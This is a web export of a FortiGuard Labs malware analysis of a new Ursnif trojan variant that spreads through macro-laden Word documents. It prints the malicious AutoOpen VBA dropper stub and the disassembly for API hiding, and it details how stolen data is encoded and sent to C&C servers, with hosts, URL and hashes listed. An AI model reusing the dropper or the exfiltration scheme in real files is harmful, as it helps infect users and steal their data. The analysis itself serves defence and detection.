{"id":16011,"date":"2019-08-07T09:40:08","date_gmt":"2019-08-07T17:40:08","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2019\/08\/07\/news-9755\/"},"modified":"2019-08-07T09:40:08","modified_gmt":"2019-08-07T17:40:08","slug":"news-9755","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2019\/08\/07\/news-9755\/","title":{"rendered":"New Ursnif Variant Spreading by Word Document"},"content":{"rendered":"<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12\">\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p><i>Breaking FortiGuard Labs Threat Research<\/i><\/p>\n<p><i><br \/> \u00a0NOTE: This threat is actively spreading. During my analysis, which started with just a few samples, the volume of captured samples and the number of triggers this new variant set off in our global network of sensors kept growing. Because of this, we highly recommend that organizations stay alert to this currently expanding threat.<\/i><\/p>\n<p>Recently, FortiGuard Labs captured a number of Word documents from the wild, which were spreading a new variant of the Ursnif trojan.<\/p>\n<p>I did some research on this new variant, and in this blog I will present what it does on a victim\u2019s machine and what kinds of techniques it uses. Ursnif trojan, also known as Dreambot, Gozi, and ISFB, has been alive for years and focuses on stealing information from a victim\u2019s machine.<\/p>\n<h2>Word Sample Analysis<\/h2>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/ursnif-variant-spreading-word-document\/_jcr_content\/root\/responsivegrid\/image.img.png\" alt=\"Ursnif Word Document sample content\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 1. The Word sample content<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>These infected Word documents contain malicious VBA code. In this campaign, the file names of the Word documents are in the format: \u201cinfo_[date].doc\u201d. The sample in this analysis has the name info_07.25.doc.<\/p>\n<p>When a victim opens the Word document, it displays a security warning message designed to protect MS Word users from malicious macros (VBA code). \u00a0However, the document content deceives victims to click the \u201cEnable Content\u201d button, as shown in Figure 1. When the button is clicked, the malicious VBA code is executed because the code is in an AutoOpen sub that is executed at opening the document.<\/p>\n<p>The malicious code is simple, as shown below:<br \/> \u00a0<\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<p style=\"margin: 0in 0in 6pt; line-height: normal;\"><em><span style=\"color: black; background: #D9D9D9;\">Sub AutoOpen()<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 6pt; line-height: normal;\"><em><span style=\"color: black; background: #D9D9D9;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Set fPzzMCZTdBHCipC = <\/span><span style=\"color: red; background: #D9D9D9;\">ymwsrw<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 6pt; line-height: normal;\"><em><span style=\"color: black; background: #D9D9D9;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Set KiVsBKglbMn = fPzzMCZTdBHCipC.<\/span><span style=\"color: red; background: #D9D9D9;\">Controls<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 6pt; line-height: normal;\"><em><span style=\"color: black; background: #D9D9D9;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; KKzPMDRPhZsJz = KiVsBKglbMn(2) + KiVsBKglbMn(0)<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 6pt; line-height: normal;\"><em><span style=\"color: black; background: #D9D9D9;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Set PhFMwPKBcLcsm = VBA.<\/span><span style=\"color: red; background: #D9D9D9;\">GetObject<\/span><span style=\"color: black; background: #D9D9D9;\">(KiVsBKglbMn(100 &#8211; 90 &#8211; 9).Text)<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 6pt; line-height: normal;\"><em><span style=\"color: black; background: #D9D9D9;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; PhFMwPKBcLcsm.<\/span><span style=\"color: red; background: #D9D9D9;\">Run<\/span><span style=\"color: black; background: #D9D9D9;\">! KKzPMDRPhZsJz, 0 + 7596<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 6pt; line-height: 115%;\"><em><span style=\"color: black; background: #D9D9D9;\">End Sub<\/span><\/em><\/p>\n<\/div><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>More code is read from three controls on the UserForm, named \u201cymwsrw\u201d. It then puts PowerShell code from control\u2019s text property together and executes it. The code is PowerShell code. I show the code in Figure 2, where you can see how the PowerShell code is transformed.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/ursnif-variant-spreading-word-document\/_jcr_content\/root\/responsivegrid\/image_1016213183.img.png\" alt=\"Executing the PowerShell code\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 2. Executing the PowerShell code<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The first part is the original PowerShell code that the VBA code generates. As you can see, it is Base64 encoded (-Enc is short for -EncodedCommand). After the code is Base64 decoded, the code is shown in the second part, which still contains Base64 encoded data. It continues to decode the data, then decompresses it to get the final PowerShell code in the bottom part of Figure 2.<\/p>\n<p>Going through the final code, it then downloads a file from a URL (with a red underscore) into \u201c$Env:UserProfile\u201d folder and eventually starts it by calling \u201c[Diagnostics.Process]::STaRt($UpwpWW)\u201d. Of course, results may vary as these captured Word samples use many different URLs to download Ursnif.<\/p>\n<p>Regardless, the downloaded executable file is a variant of Ursnif and the Word document sample is an Ursnif Downloader.<\/p>\n<h2>Start Downloaded Ursnif<\/h2>\n<p>By checking the downloaded file, we learned that it had been compiled on July 25<sup>th<\/sup>, 2019. When it starts, it dumps several dynamic code blocks into its memory and executes them. One among them is the main module that performs all Ursnif work.\u00a0 \u00a0\u00a0<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/ursnif-variant-spreading-word-document\/_jcr_content\/root\/responsivegrid\/image_1899232419.img.png\" alt=\"Extracted Ursnif Main module\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 3. Extracted Ursnif Main module<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>In Figure 3, the data portion of the malware shows the file header of the decompressed Main module. It\u2019s a little tricky here as it does not have DOS magic word \u201cMZ\u201d that should appear in the first red rectangle, nor the PE header magic word \u201cPE\u201d that should be in the second rectangle. Ursnif removed these magic words to prevent its being identified, but Ursnif knows how to load this module without them.<\/p>\n<p>It continues to load every section from the PE structure into a newly allocated memory. It then repairs its relocation data and imports API functions contained in an import table. When everything is ready, it calls the OEP (Entry Point) of the main module. The process is just like what a packer does.<\/p>\n<h2>Anti-Analysis in Main Module of Ursnif<\/h2>\n<p>Ursnif uses some anti-analysis techniques to make it harder for it to be analyzed. For example, it hides some API functions, which are parsed dynamically each time they are called so that static analysis is difficult; most data (in the \u201c.bss\u201d section of PE structure) in the main module is encrypted, and only gets decrypted at runtime. Let\u2019s take a look at the details.<\/p>\n<p>Ursnif registers a vectored exception handler by calling the API RtlAddVectoredExceptionHandler, whose second parameter points to the handler function. So, when it runs into any exception, the system will call this handler function first. Figure 4 shows the pseudo code for that.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/ursnif-variant-spreading-word-document\/_jcr_content\/root\/responsivegrid\/image_38913304.img.png\" alt=\"Register exception handler function\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 4.  Register exception handler function<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Ursnif uses the exception handler function to decrypt the data in the \u201c.bss\u201d section. To do this, it modifies the memory-protection option for the memory with the \u201c.bss\u201d section, where the encrypted data is in <b>PAGE_NOACCESS<\/b> (0x1). Therefore, when Ursnif reads data in this area, the <b>access violation<\/b> exception (Exception Code C0000005) happens so that the exception handler function gets called.<\/p>\n<p>Figure 5 is a screenshot of when Ursnif has just decrypted the data in the \u201c.bss\u201d section. This section\u2019s size is 1000H. Most constant strings and API names are here, which are also used throughout Ursnif\u2019s lifetime.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/ursnif-variant-spreading-word-document\/_jcr_content\/root\/responsivegrid\/image_2005121945.img.png\" alt=\"Part of decrypted \u201c.bss\u201d data\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 5.  Part of decrypted \u201c.bss\u201d data<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>There are a number of key APIs hidden in the main module. When it needs to call an API, it just needs to call a function named \u201cAPI_Finder\u201d to dynamically load the dll file that the API belongs to and find the API in it by calling LoadLibrary and then GetProcAddress.<\/p>\n<p>The API names in the string are just from the decrypted \u201c.bss\u201d section in a structure with the strings and the offsets. \u00a0\u201cAPI_Finder\u201d can locate the API name by its offset. Here is the ASM code snippet when using API_Finder to get API \u201cCloseClipboard\u201d from \u201cUser32.dll\u201d.<br \/> \u00a0<\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">000C9D27 &nbsp;&nbsp;<\/span><span style=\"color: #2818f4; background: #D9D9D9;\">sub_C9D27 proc near <\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">000C9D27&nbsp;&nbsp;&nbsp; mov&nbsp;&nbsp;&nbsp;&nbsp; eax, offset <\/span><strong><span style=\"color: red; background: #D9D9D9;\">off_CC100<\/span><\/strong><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">000C9D2C&nbsp;&nbsp;&nbsp; jmp&nbsp;&nbsp;&nbsp;&nbsp; $+5<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">000C9D31<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">000C9D31 loc_C9D31:<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">000C9D31&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp; ecx<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">000C9D32&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp; edx<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">000C9D33&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp; eax&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span style=\"color: #2818f4; background: #D9D9D9;\">; API function index<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">000C9D34&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp; offset dword_CB2F4 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span style=\"color: #2818f4; background: #D9D9D9;\">; dll name, 0CB150-&gt; &#8220;User32.dll&#8221;<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">000C9D39&nbsp;&nbsp;&nbsp; <\/span><strong><span style=\"color: red; background: #D9D9D9;\">call&nbsp;&nbsp;&nbsp; API_Finder<\/span><\/strong><span style=\"color: black; background: #D9D9D9;\"> &nbsp;&nbsp;<\/span><span style=\"color: #2818f4; background: #D9D9D9;\">;It calls LoadLibrary and GetProcAddress. The API is in eax.<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">000C9D3E&nbsp;&nbsp;&nbsp; pop&nbsp;&nbsp;&nbsp;&nbsp; edx<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">000C9D3F&nbsp;&nbsp;&nbsp; pop&nbsp;&nbsp;&nbsp;&nbsp; ecx<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">000C9D40&nbsp;&nbsp;&nbsp; <\/span><strong><span style=\"color: red; background: #D9D9D9;\">jmp&nbsp;&nbsp;&nbsp;&nbsp; eax<\/span><\/strong><span style=\"color: black; background: #D9D9D9;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span style=\"color: #2818f4; background: #D9D9D9;\">; calls the API function<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">000C9D40 <\/span><span style=\"color: #2818f4; background: #D9D9D9;\">sub_C9D27 endp<\/span><\/p>\n<\/div><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>\u201cAPI_Finder\u201d obtains the API function index (It\u2019s 0xCC100 here) from its second argument, from which the \u201cAPI_Finder\u201d can compute the offset of the string \u201cCloseClipboard\u201d. The first argument to \u201cAPI_Finder\u201d points to a structure with a library name. The entry point of \u201cCloseClipboard\u201d is returned in \u201ceax\u201d, which is called at last.<\/p>\n<h2>Using a COM Instance to Send Data to the C&amp;C<\/h2>\n<p>If you keep an eye on the process list in Task Manager when Ursnif runs, you will find that there are many \u201ciexplore.exe\u201d processes that appear and disappear from time to time. And there is a lot of traffic out of \u201ciexplorer.exe\u201d.\u00a0 That is what Ursnif does to send out collected data from the victim\u2019s system. It does not directly create the process \u201ciexplorer.exe\u201d, but COM (Component Object Model) does because Ursnif creates a COM instance by calling API \u201cCoCreateInstance\u201d, which is a hidden API function. This is the ASM code snippet of calling it.\u00a0 \u00a0\u00a0<br \/> \u00a0<\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">[&hellip;]<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">seg000:000C3E0B&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; jz&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; loc_C3E98<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">seg000:000C3E11&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;push&nbsp;&nbsp;&nbsp; esi<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">seg000:000C3E12&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp; offset rrid <\/span><span style=\"color: #2818f4; background: #D9D9D9;\">; {EAB22AC1-30C1-11CF-A7EB-0000C05BAE0B}<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">seg000:000C3E17&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp; 4&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span style=\"color: #2818f4; background: #D9D9D9;\">; dwClsContext<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">seg000:000C3E19&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp; 0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span style=\"color: #2818f4; background: #D9D9D9;\">; pUnkOuter<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">seg000:000C3E1B&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp; offset rclsid <\/span><span style=\"color: #2818f4; background: #D9D9D9;\">; {0002DF01-0000-0000-C000-000000000046}<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">seg000:000C3E20&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><strong><span style=\"color: red; background: #D9D9D9;\">call&nbsp;&nbsp;&nbsp; ds:CoCreateInstance<\/span><\/strong><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">seg000:000C3E26&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; test&nbsp;&nbsp;&nbsp; eax, eax<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">[&hellip;]<\/span><\/p>\n<\/div><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The first argument is a GUID of \u201c{0002DF01-0000-0000-C000-000000000046}\u201d, which is the CLSID of \u201cInternet Explorer\u201d. The fourth argument is an interface ID, \u201c{EAB22AC1-30C1-11CF-A7EB-0000C05BAE0B}\u201d, which is an interface of \u201cIWebBrowser\u201d. The COM object can also be created by the string ID \u201cInternetExplorer.Application\u201d.<\/p>\n<p>The interface \u201c<a href=\"https:\/\/docs.microsoft.com\/en-us\/dotnet\/api\/shdocvw.iwebbrowser?view=dynamics-usd-3\">IWebBrowser<\/a>\u201d implements a variety of methods to enable what you can do with the MS IE browser to access web sites such as GoBack(), GoHome(), Navigate(), Refresh(), and so on. COM starts \u201ciexplorer.exe\u201d and later loads the interface \u201cIWebBrowser\u201d, whose methods then are ready to be called. Navigate() method is used by Ursnif to send collected data to its C&amp;C server, whose first argument is a URL string.<\/p>\n<p>Ursnif has compressed configuration data in the \u201c.reloc\u201d section of the main module. Decompressing it extracts the data structure shown in Figure 6.\u00a0 \u00a0\u00a0<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/ursnif-variant-spreading-word-document\/_jcr_content\/root\/responsivegrid\/image_603866693.img.png\" alt=\"Decompressed configuration data\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 6.  Decompressed configuration data<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>At the bottom, you may notice the C&amp;C host list includes &quot;microsoft.com&quot;, &quot;update.microsoft.com&quot;, &quot;avast.com&quot;, &quot;cdevinoucathrine.info&quot;, &quot;zcei60houston.club&quot; and &quot;kenovella.club&quot;. This seems odd. Why are the hosts of \u201cmicrosoft\u201d and \u201cavast\u201d listed here?\u00a0 In fact, this is a way to deceive researchers who capture and analyze the traffic. <\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/ursnif-variant-spreading-word-document\/_jcr_content\/root\/responsivegrid\/image_596506425.img.png\" alt=\"Format of collected information\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 7.  Format of collected information<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>A snippet of code in Figure 7 allowes Ursnif to format the collected information from victim\u2019s system. One formatted string looks like this:<br \/> \u00a0<\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<p style=\"margin: 0in 0in 6pt; line-height: 115%;\"><span style=\"color: red; background: #D9D9D9;\">soft<\/span><span style=\"color: black; background: #D9D9D9;\">=3&amp;<\/span><span style=\"color: red; background: #D9D9D9;\">version<\/span><span style=\"color: black; background: #D9D9D9;\">=214082&amp;<\/span><span style=\"color: red; background: #D9D9D9;\">user<\/span><span style=\"color: black; background: #D9D9D9;\">=0364812000299edca18c7b9e8ed0ab6d&amp;<\/span><span style=\"color: red; background: #D9D9D9;\">server<\/span><span style=\"color: black; background: #D9D9D9;\">=12&amp;<\/span><span style=\"color: red; background: #D9D9D9;\">id<\/span><span style=\"color: black; background: #D9D9D9;\">=3387&amp;<\/span><span style=\"color: red; background: #D9D9D9;\">crc<\/span><span style=\"color: black; background: #D9D9D9;\">=1&amp;<\/span><span style=\"color: red; background: #D9D9D9;\">uptime<\/span><span style=\"color: black; background: #D9D9D9;\">=2193<\/span><\/p>\n<\/div><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<ul>\n<li>\u201csoft\u201d and \u201cversion\u201d are constant.<\/li>\n<li>\u201cuser\u201d is a sort of unique user ID. It consists of four DWORDs that were computed from a hash-code of the victim\u2019s User Name and Computer Name, as well as its CPU ID.<\/li>\n<li>\u201cserver\u201d and \u201cid\u201d are from the decompressed configuration data. They are behind the host strings, 3387 and 12, in Figure 6.<\/li>\n<li>\u201ccrc\u201d is another constant of 1.<\/li>\n<li>\u201cuptime\u201d is a time value that tells the attacker the uptime since the victim\u2019s system started.<\/li>\n<\/ul>\n<p>\u00a0Ursnif encodes the above strings using Base64, which will then be a part of a URL. Other than that, it replaces several bytes with their hex strings in the encoded string. (For example: \u201c+\u201d becomes \u201c_2B\u201d, \u201c\/\u201d becomes \u201c_2F\u201d.) After that, it inserts a random number of \u201c\/\u201d into it and adds a prefix \u201c\/images\/\u201d and suffix \u201c.avi\u201d to make the URL look normal.<\/p>\n<p>Now, the collected data is almost ready to be sent to its C&amp;C server. As I said before, there are six host strings in the decompressed configuration. Ursnif picks one host string from them and makes a complete URL using the host and above encoded string. It will be the first argument of the method &quot;IWebBrowser.Navigate()&quot;. It picks the next host string after a 20 second wait. Below is an example of a URL, which will be sent to the C&amp;C server.<br \/> \u00a0<\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<p style=\"margin: 0in 0in 6pt; line-height: 115%;\"><span style=\"color: black; background: #D9D9D9;\">hxxps:\/\/<strong>cdevinoucathrine.info<\/strong><\/span><span style=\"color: red; background: #D9D9D9;\">\/images\/<\/span><span style=\"color: black; background: #D9D9D9;\">SZmbQhNDM\/NRU9kkrJ9pgbhJ0ElLjX\/GmdR4KRmiqx7Vh8d_2B\/e89HXjxRxOy7vuzb_2F1OA\/xM3INQh  D3eZsE\/D_2Fiv5c\/ju_2Bs3XEZzWGZSfnBvVAvj\/9xxBpMO3_2\/BGf9ybUt5cslyUgIK\/_2BnKRHLrDUUyi44DVzf\/T<\/span><span style=\"color: red; background: #D9D9D9;\">.avi<\/span><\/p>\n<\/div><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>This is a host list of C&amp;C servers that I extracted from two variants:<\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">hxxps:\/\/cdevinoucathrine.info<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">hxxps:\/\/zcei60houston.club<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">hxxps:\/\/kenovella.club<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">hxxps:\/\/z76johnson.club<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">hxxps:\/\/s75eagtyec.com<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">hxxps:\/\/s97pe2360.club<\/span><\/p>\n<\/div><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>So far, these are all of my findings for this Ursnif variant. I will continue to monitor this campaign for more details.<\/p>\n<h2>Solution:<\/h2>\n<p>This malicious Word document has been detected as \u201c<b>VBA\/Agent.A329!tr.dldr<\/b>\u201d by the FortiGuard AntiVirus service. The CDR (Content Disarm &amp; Reconstruction) feature in FortiGate and FortiMail can also neutralize this threat by removing all malicious VBA code.<\/p>\n<p>The downloaded file has been detected as \u201c<b>W32\/Ursnif.AHSY!tr<\/b>\u201d by the FortiGuard AntiVirus service.<\/p>\n<p>The URL used to download Ursnif has been rated as \u201c<b>Malicious Websites<\/b>\u201d by the FortiGuard WebFilter service.<\/p>\n<h2>IoC:<\/h2>\n<p><b>URL:<br \/> <\/b>&quot;hxxp:\/\/npkf32ymonica.com\/sywo\/fgoow.php?l=joow8.gxl&quot;<\/p>\n<p><b>Sample SHA256:<br \/> <\/b>info_07.25.doc:<\/p>\n<p>AAA7758D75967D28847B3CB8A9B3E3032F31EC45D12C9904A7BC98C189726005<\/p>\n<p>Downloaded executable file:<br \/> AAC9D2D21F634157EB8D3867A2C72042A83CABC3F0142B12763312F5A0B0A83A<\/p>\n<p><i>Learn more about\u00a0<a href=\"https:\/\/www.fortinet.com\/fortiguard\/threat-intelligence\/threat-research.html?utm_source=nreleaseblog&amp;utm_campaign=2018-q2-fortiguardlabs-cta\">FortiGuard Labs<\/a>\u00a0and the FortiGuard Security Services\u00a0<a href=\"https:\/\/www.fortinet.com\/support-and-training\/support-services\/fortiguard-security-subscriptions.html?utm_source=blog&amp;utm_campaign=2018-blog-security-services\">portfolio<\/a>.\u00a0<a href=\"https:\/\/www.fortinet.com\/fortiguard\/threat-intelligence\/threat-research.html?utm_source=nreleaseblog&amp;utm_campaign=2018-q2-fortiguardlabs-cta\">Sign up<\/a>\u00a0for our weekly FortiGuard Threat Brief.\u00a0<\/i><\/p>\n<p><i>Read about the FortiGuard\u00a0<a href=\"https:\/\/www.fortinet.com\/support-and-training\/support-services\/fortiguard-security-subscriptions\/security-rating.html?utm_source=blog&amp;utm_campaign=2018-blog-security-rating-service\">Security Rating Service<\/a>, which provides security audits and best practices.<\/i><\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn 